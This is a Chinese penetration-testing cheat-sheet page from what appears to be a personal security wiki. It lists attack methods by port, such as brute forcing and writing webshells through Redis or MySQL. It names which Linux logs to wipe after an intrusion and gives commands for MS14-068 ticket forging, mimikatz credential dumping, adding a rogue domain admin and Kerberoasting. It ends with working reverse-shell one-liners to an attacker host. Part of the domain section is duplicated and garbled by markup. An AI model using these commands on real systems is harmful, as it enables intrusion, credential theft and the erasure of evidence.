
<!doctype html>
<html lang="zh" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-8.1.8">
    
    
      
        <title>渗透测试 - klsfct Docs</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.6e60f8b8.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.e6a45f82.min.css">
        
          
          
          <meta name="theme-color" content="#000000">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../js/stylesheets/extra.css">
    
    <script>__md_scope=new URL("../..",location),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="" data-md-color-primary="black" data-md-color-accent="deep-orange">
  
    
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#_1" class="md-skip">
          跳转至
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="页眉">
    <a href="../.." title="klsfct Docs" class="md-header__button md-logo" aria-label="klsfct Docs" data-md-component="logo">
      
  <img src="../../images/logo.jpg" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            klsfct Docs
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              渗透测试
            
          </span>
        </div>
      </div>
    </div>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="搜索" placeholder="搜索" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="查找">
        
        <button type="reset" class="md-search__icon md-icon" aria-label="清空当前内容" tabindex="-1">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            正在初始化搜索引擎
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="标签" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  
  


  <li class="md-tabs__item">
    <a href="../.." class="md-tabs__link">
      主页
    </a>
  </li>

      
        
  
  
    
  


  
  
  
    <li class="md-tabs__item">
      <a href="../%E7%9B%AE%E5%BD%95/" class="md-tabs__link md-tabs__link--active">
        安全wiki
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../实战相关/目录.md" class="md-tabs__link">
        实战相关
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../redteam/%E7%BA%A2%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-tabs__link">
        红队
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../blueteam/%E8%93%9D%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-tabs__link">
        蓝队
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../%E6%8C%96%E6%B4%9E%E7%9B%B8%E5%85%B3/%E4%BC%97%E6%B5%8B%E9%A1%B9%E7%9B%AE/" class="md-tabs__link">
        挖洞相关
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../about/aboutme/" class="md-tabs__link">
        About
      </a>
    </li>
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="导航栏" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="klsfct Docs" class="md-nav__button md-logo" aria-label="klsfct Docs" data-md-component="logo">
      
  <img src="../../images/logo.jpg" alt="logo">

    </a>
    klsfct Docs
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        主页
      </a>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2" type="checkbox" id="__nav_2" checked>
      
      
      
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_2">
          安全wiki
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="安全wiki" data-md-level="1">
        <label class="md-nav__title" for="__nav_2">
          <span class="md-nav__icon md-icon"></span>
          安全wiki
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E7%9B%AE%E5%BD%95/" class="md-nav__link">
        目录
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/" class="md-nav__link">
        安全基础
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../Web%E5%AE%89%E5%85%A8/" class="md-nav__link">
        web安全
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8/" class="md-nav__link">
        数据安全
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../CMS%E5%AE%89%E5%85%A8/" class="md-nav__link">
        cms安全
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" class="md-nav__link">
        流量分析
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8/" class="md-nav__link">
        服务器、中间件安全
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" class="md-nav__link">
        应急响应
      </a>
    </li>
  

            
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          渗透测试
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        渗透测试
      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="目录">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      目录
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    渗透思路
  </a>
  
    <nav class="md-nav" aria-label="渗透思路">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#_2" class="md-nav__link">
    端口对应的服务
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_3" class="md-nav__link">
    流程
  </a>
  
    <nav class="md-nav" aria-label="流程">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#linux" class="md-nav__link">
    入侵Linux后要清楚的日志
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_4" class="md-nav__link">
    域内横向移动
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#shell" class="md-nav__link">
    反弹shell
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E9%A1%B9%E7%9B%AE%E6%A2%B3%E7%90%86/" class="md-nav__link">
        安全测试项目梳理
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" data-md-state="indeterminate" type="checkbox" id="__nav_3" checked>
      
      
      
        
          
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_3">
          实战相关
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="实战相关" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          实战相关
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../实战相关/目录.md" class="md-nav__link">
        目录
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../%E5%AE%9E%E6%88%98%E7%9B%B8%E5%85%B3/%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" class="md-nav__link">
        漏洞测试
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../%E5%AE%9E%E6%88%98%E7%9B%B8%E5%85%B3/%E5%86%85%E9%83%A8%E6%B8%97%E9%80%8F%E6%AF%94%E8%B5%9B/" class="md-nav__link">
        内部渗透比赛
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" data-md-state="indeterminate" type="checkbox" id="__nav_4" checked>
      
      
      
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_4">
          红队
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="红队" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          红队
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E7%BA%A2%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-nav__link">
        目录
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" class="md-nav__link">
        信息收集
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E6%BC%8F%E6%B4%9E%E5%BA%93/" class="md-nav__link">
        漏洞库
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E6%BA%AF%E6%BA%90%E5%88%86%E6%9E%90/" class="md-nav__link">
        溯源分析
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E9%92%93%E9%B1%BC/" class="md-nav__link">
        钓鱼
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91%E4%B8%8E%E9%9A%A7%E9%81%93/" class="md-nav__link">
        代理转发与隧道
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/提取系列.md" class="md-nav__link">
        提权系列
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/域渗透测试一条龙.md" class="md-nav__link">
        域渗透
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_5" data-md-state="indeterminate" type="checkbox" id="__nav_5" checked>
      
      
      
        
          
        
          
        
          
        
          
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_5">
          蓝队
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="蓝队" data-md-level="1">
        <label class="md-nav__title" for="__nav_5">
          <span class="md-nav__icon md-icon"></span>
          蓝队
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../blueteam/%E8%93%9D%E9%98%9F%E7%9B%AE%E5%BD%95/" class="md-nav__link">
        目录
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../blueteam/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" class="md-nav__link">
        应急响应
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../blueteam/%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/" class="md-nav__link">
        日志分析
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../blueteam/window实战.md" class="md-nav__link">
        window实战
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/linux实战.md" class="md-nav__link">
        linux实战
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../redteam/web实战.md" class="md-nav__link">
        web实战
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_6" data-md-state="indeterminate" type="checkbox" id="__nav_6" checked>
      
      
      
        
          
        
          
        
      
      
        <label class="md-nav__link" for="__nav_6">
          挖洞相关
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="挖洞相关" data-md-level="1">
        <label class="md-nav__title" for="__nav_6">
          <span class="md-nav__icon md-icon"></span>
          挖洞相关
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../%E6%8C%96%E6%B4%9E%E7%9B%B8%E5%85%B3/%E4%BC%97%E6%B5%8B%E9%A1%B9%E7%9B%AE/" class="md-nav__link">
        众测项目
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../%E6%8C%96%E6%B4%9E%E7%9B%B8%E5%85%B3/%E6%80%9D%E8%B7%AF%E6%96%B9%E6%B3%95/" class="md-nav__link">
        思路方法
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_7" data-md-state="indeterminate" type="checkbox" id="__nav_7" checked>
      
      
      
        
          
        
      
      
        <label class="md-nav__link" for="__nav_7">
          About
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="About" data-md-level="1">
        <label class="md-nav__title" for="__nav_7">
          <span class="md-nav__icon md-icon"></span>
          About
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../about/aboutme/" class="md-nav__link">
        about me
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="目录">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      目录
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    渗透思路
  </a>
  
    <nav class="md-nav" aria-label="渗透思路">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#_2" class="md-nav__link">
    端口对应的服务
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_3" class="md-nav__link">
    流程
  </a>
  
    <nav class="md-nav" aria-label="流程">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#linux" class="md-nav__link">
    入侵Linux后要清楚的日志
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_4" class="md-nav__link">
    域内横向移动
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#shell" class="md-nav__link">
    反弹shell
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                

  <h1>渗透测试</h1>

<h2 id="_1">渗透思路<a class="headerlink" href="#_1" title="Permanent link">&para;</a></h2>
<h3 id="_2">端口对应的服务<a class="headerlink" href="#_2" title="Permanent link">&para;</a></h3>
<p>21端口，ftp 可爆破或者尝试匿名anonymous/空登录</p>
<table>
<thead>
<tr>
<th>21 ftp</th>
<th>可爆破<br/>匿名anonymous/空登录<br/>MS12-073</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>22 ssh</td>
<td>爆破<br>28个退格</td>
<td></td>
</tr>
<tr>
<td>23 telnet</td>
<td>爆破</td>
<td></td>
</tr>
<tr>
<td>25 smtp</td>
<td>邮件伪造</td>
<td></td>
</tr>
<tr>
<td>53 dns</td>
<td>dns区域传输dns劫持<br>dns缓存投毒 dns欺骗<br>深度利用利用dns隧道技术刺头防火墙</td>
<td></td>
</tr>
<tr>
<td>67/68 dhcp</td>
<td>劫持欺骗</td>
<td></td>
</tr>
<tr>
<td>80 web</td>
<td></td>
<td></td>
</tr>
<tr>
<td>110 pop3</td>
<td>爆破</td>
<td></td>
</tr>
<tr>
<td>139 samba</td>
<td>未授权访问<br/>远程代码执行漏洞</td>
<td></td>
</tr>
<tr>
<td>143 iamp</td>
<td>爆破</td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>445 smb</td>
<td>ms08-067 ms17-010溢出漏洞<br/>IPC$攻击</td>
<td></td>
</tr>
<tr>
<td>1433 sqlserver</td>
<td>溢出攻击<br>空密码入侵。1433还有一个漏洞，就是如果默认安装的话，用户名是sa,密码是空的</td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>3306 mysql</td>
<td>暴破<br/>成功后用mysql写入webshell，或者构造vbs写入服务器启动项，启动时添加管理员账号打开3389端口</td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>8088 hadoop yarn</td>
<td>资源管理器rest api存在未授权访问漏洞，通过curl -v -X POST申请新的application，构造提交任务后即可在相应目录生成webshell</td>
<td></td>
</tr>
<tr>
<td>8161 apache activeMQ</td>
<td>console存在默认端口和默认密码、未授权访问<br/>当activeMQ开启put请求时构造payload（即不存在的目录）response会返回相应的物理路径信息，当fileserver存在时我们可以上传jspwebshell，<br/>activeMQ还支持move协议，导致任意文件移动漏洞</td>
<td></td>
</tr>
<tr>
<td>6379 redis</td>
<td>配置不当的未授权 链接redis（./redis-cli -h IP)，可实现写入webshell，写入crontab计划任务fantanshell，以及写入ssh公钥，获取操作系统权限<br/>暴破</td>
<td></td>
</tr>
<tr>
<td>11211 memcached</td>
<td>默认情况下存在未授权访问，telnet ip就可以获得服务器敏感信息</td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<h2 id="_3">流程<a class="headerlink" href="#_3" title="Permanent link">&para;</a></h2>
<p>信息收集</p>
<p>漏洞挖掘</p>
<p>漏洞利用&amp;权限提升</p>
<p>清除测试数据，输出报告</p>
<h3 id="linux">入侵Linux后要清楚的日志<a class="headerlink" href="#linux" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>web</th>
<th>sed -i -e 定向清楚  access.log, error.log</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>history</td>
<td>~/bash_history</td>
<td></td>
</tr>
<tr>
<td>wtmp</td>
<td>/var/log/wtmp</td>
<td></td>
</tr>
<tr>
<td>登录日志</td>
<td>/var/log/secure</td>
<td></td>
</tr>
</tbody>
</table>
<h3 id="_4">域内横向移动<a class="headerlink" href="#_4" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>MS14-068</th>
<th>kerkeo    klist klist  purge  删除所有票据<br>直接访问域控制器的C盘目录：dir \qianxiao996-dm.qianxiao996.com\C<span class="arithmatex"><span class="MathJax_Preview"><br>查看本机用户信息,记录用户名与SID号whoami /all<br>进入MS14-068目录，使用以下命令：ip为域控的ip MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword><br/>MS14-068.exe -u <a href="&#109;&#97;&#105;&#108;&#116;&#111;&#58;&#122;&#104;&#97;&#110;&#103;&#115;&#97;&#110;&#102;&#101;&#110;&#103;&#64;&#113;&#105;&#97;&#110;&#120;&#105;&#97;&#111;&#57;&#57;&#54;&#46;&#99;&#111;&#109;">&#122;&#104;&#97;&#110;&#103;&#115;&#97;&#110;&#102;&#101;&#110;&#103;&#64;&#113;&#105;&#97;&#110;&#120;&#105;&#97;&#111;&#57;&#57;&#54;&#46;&#99;&#111;&#109;</a> -s S-1-5-21-2461438818-3229013638-4126918765-1108 -d 192.168.91.131 -p ABCabc123<code>&lt;br/&gt;生成的票据文件&lt;br&gt;打开mimikatz，注入票据&lt;br&gt;</code>mimikatz # kerberos::purge          //清空当前凭证<br/>mimikatz # kerberos::list           //查看当前机器凭证<br/>mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中</span><script type="math/tex"><br>查看本机用户信息,记录用户名与SID号whoami /all<br>进入MS14-068目录，使用以下命令：ip为域控的ip MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword><br/>MS14-068.exe -u <a href="&#109;&#97;&#105;&#108;&#116;&#111;&#58;&#122;&#104;&#97;&#110;&#103;&#115;&#97;&#110;&#102;&#101;&#110;&#103;&#64;&#113;&#105;&#97;&#110;&#120;&#105;&#97;&#111;&#57;&#57;&#54;&#46;&#99;&#111;&#109;">&#122;&#104;&#97;&#110;&#103;&#115;&#97;&#110;&#102;&#101;&#110;&#103;&#64;&#113;&#105;&#97;&#110;&#120;&#105;&#97;&#111;&#57;&#57;&#54;&#46;&#99;&#111;&#109;</a> -s S-1-5-21-2461438818-3229013638-4126918765-1108 -d 192.168.91.131 -p ABCabc123<code>&lt;br/&gt;生成的票据文件&lt;br&gt;打开mimikatz，注入票据&lt;br&gt;</code>mimikatz # kerberos::purge          //清空当前凭证<br/>mimikatz # kerberos::list           //查看当前机器凭证<br/>mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中<code>&lt;br&gt;&lt;br/&gt;再次列出域控制器的C盘目录：再次列出域控制器的C盘目录：dir \\qianxiao996-dm.qianxiao996.com\Cmimikatz # kerberos::purge          //清空当前凭证&lt;br/&gt;mimikatz # kerberos::list           //查看当前机器凭证&lt;br/&gt;mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中</code><br><br/>再次列出域控制器的C盘目录：再次列出域控制器的C盘目录：dir \qianxiao996-dm.qianxiao996.com\C</script></span><br>使用PSTools目录下的PsExec.exe获取shell:PsExec.exe \qianxiao996-dm.qianxiao996.com cmd.exe<br>添加域管理员net user wangergou ABCabc123 /add /domain<br/>net group "Domain admins" wangergou /add /domain</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>0x02.GPP漏洞</td>
<td>组策略下发<br>管理工具中打开组策略管理：选择域，并新建组织单位：选择新建的组织单位，并建立GPO：点击新建的GPO：设定组策略作用范围：（选择一个组，必须是存在的组）右键选择GPO，选择编辑–本地用户和组：新建一个用户：域成员上更新组策略，并查看用户:gpupdate net user</td>
<td></td>
</tr>
<tr>
<td>0x03.SPN票据破解</td>
<td>列出当前用户的票据：Kerberos::list <br>导出票据：Kerberos::list /export  由于加密类型是RC4_HMAC_MD5，Kerberos协议第四步TGS-REP将会返回用服务帐户的NTLM密码哈希加密的票据。 使用字典进行暴力破解：（2.txt为字典）python tgsrepcrack.py 2.txt "1-40a10000-linghuchong@MSSQLSvc<sub>College-DS1</sub>1433-COLLEGE.COM.kirbi"<br>虽然"sekurlsa::pth"在mimikatz中被称之为"Pass The Hash",但是其已经超越了以前的"Pass The Hash"，部分人将其命名为"Overpass-the-hash"，也就是"Pass-the-key"<br/>登录域成员机器，以管理员身份运行mimikatz，并输入以下命令：<br>privilege::debug  log sekurlsa::logonpasswords</td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<h3 id="shell">反弹shell<a class="headerlink" href="#shell" title="Permanent link">&para;</a></h3>
<p>Windows: powersnell 反弹shell、powercat 反弹shell
Linux: bash 反弹shell、netcat 反弹shell、wget 反弹shell、python 反弹shell、
php反弹shell</p>
<p>一些脚本 </p>
<p>bash
在攻击主机上执行端口监听：
nc -lvvp port               //port 为攻击主机端口号，并且此端口号没有被占用
在目标主机上执行：
bash -i &gt;&amp; /dev/tcp/攻击主机ip/port 0&gt;&amp;1                //port 为攻击主机端口号
解释：
bash -i   打开一个交互的bash</p>
<blockquote>
<p>&amp;   将标准错误输出重定向到标准输出</p>
</blockquote>
<p>/dev/tcp/x.x.x.x/port   意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip，port为端口</p>
<p>0&gt;&amp;1   标准输入重定向到标准输出，实现你与反弹出来的shell的交互</p>
<p>/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理，Linux中还存在/dev/udp/。</p>
<p>其他版本：</p>
<p>exec 5&lt;&gt;/dev/tcp/x.x.x.x/9999</p>
<p>cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&5; done
第一条命令 建立与x.x.x.x:9999的tcp连接，并将标准输入输出作为device 5的标准输入输出</p>
<p>第二条cat &lt;&amp;5 获取device5的输入; while read line; do $line 2&gt;&amp;5 &gt;&amp;5 一旦获取到命令便运行 然后将标准输入输出以及标准错误输出到device5中
nc(netcat)反弹
在攻击主机上执行端口监听：
nc -lvvp port               //port 为攻击主机端口号，并且此端口号没有被占用</p>
<p>在目标主机上执行：
nc -e /bin/bash 攻击主机ip port</p>
<p>还可以在目标主机上这样执行
nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321               //在攻击主机上打开两个终端，分别监听 1234 和 4321 端口，得到反弹shell后，1234 终端 输入命令， 4321 终端就会获得执行相应命令后的结果</p>
